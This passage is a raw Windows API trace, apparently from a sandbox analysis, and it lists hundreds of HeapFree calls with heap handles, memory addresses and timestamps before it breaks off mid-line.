HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7f190 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a96ac0 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6c070 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7b860 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d680 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3b7c0 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a96fd0 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a08ec0 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d200 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a96bb0 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7dea0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3db00 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7f6d0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7fb50 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6bec0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a96b20 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0e500 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a954a0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3b9d0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a09280 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0df60 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d590 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a95290 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3c6f0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0f0a0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a09ca0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a80540 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3da10 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d410 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7ba10 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a94900 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e1c0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e700 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a96b50 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6b9b0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a81140 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7bbf0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a94540 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3f1e0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6e3e0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a974b0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7b2c0 | out: hHeap=0x22b349a0000) returned 1 [0086.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d3b0 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e3d0 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a93f40 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e8b0 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0f340 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d560 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a08c20 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7f460 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3bc10 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7bc20 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a94ae0 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d2c0 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7b770 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a082c0 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c9ea0 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3def0 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0a480 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d6e0 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a93550 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7d6f0 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7d930 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7c970 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d950 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a08ad0 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a99460 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3c090 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a97d80 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6ecb0 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0ad50 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a95230 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3cf30 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7d690 | out: hHeap=0x22b349a0000) returned 1 [0086.229] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e2e0 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7b560 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a94510 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3f120 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0dde0 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349e3160 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a96820 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d740 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0f310 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3c690 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a979f0 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a09730 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3cf60 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d080 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a93ee0 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6f0d0 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d5c0 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e5e0 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a97db0 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a963a0 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a94270 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e130 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3c870 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a095b0 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0eaa0 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d260 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6ca60 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d920 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6ec80 | out: hHeap=0x22b349a0000) returned 1 [0086.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7f8b0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0ac90 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0f1c0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a94060 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d8f0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7d330 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3de30 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a945a0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3dc80 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a94db0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a97360 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3ca80 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a97d50 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a09610 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a99520 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7bad0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d5f0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a95d40 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a976c0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a07c00 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d4d0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a93790 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3df20 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a94570 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3de60 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3c570 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0dd20 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a096d0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3cff0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6be90 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d320 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a969d0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a975a0 | out: hHeap=0x22b349a0000) returned 1 [0086.231] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7dc30 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e400 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a942d0 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e760 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a97960 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3c600 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a97c30 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7f2e0 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a957d0 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a09700 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a99cd0 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d710 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3c6c0 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a98320 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7db70 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0eda0 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a09c40 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a99e50 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3da70 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e730 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a977b0 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6d840 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a990d0 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3dda0 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0ed10 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6b9e0 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a98f50 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0ea70 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3dcb0 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3cc00 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a98350 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a80f30 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0e890 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a09760 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a99340 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a801e0 | out: hHeap=0x22b349a0000) returned 1 [0086.232] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d0e0 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7c7f0 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3cc90 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0ee90 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a09cd0 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7ff10 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d620 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6b770 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3de90 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3c810 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a97f30 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0ebf0 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a09370 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a99970 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d290 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3ccc0 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0e6e0 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a09850 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3cfc0 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a948d0 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7c640 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d9b0 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3cf00 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6f5e0 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d170 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0fa90 | out: hHeap=0x22b349a0000) returned 1 [0086.233] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c9d20 | out: 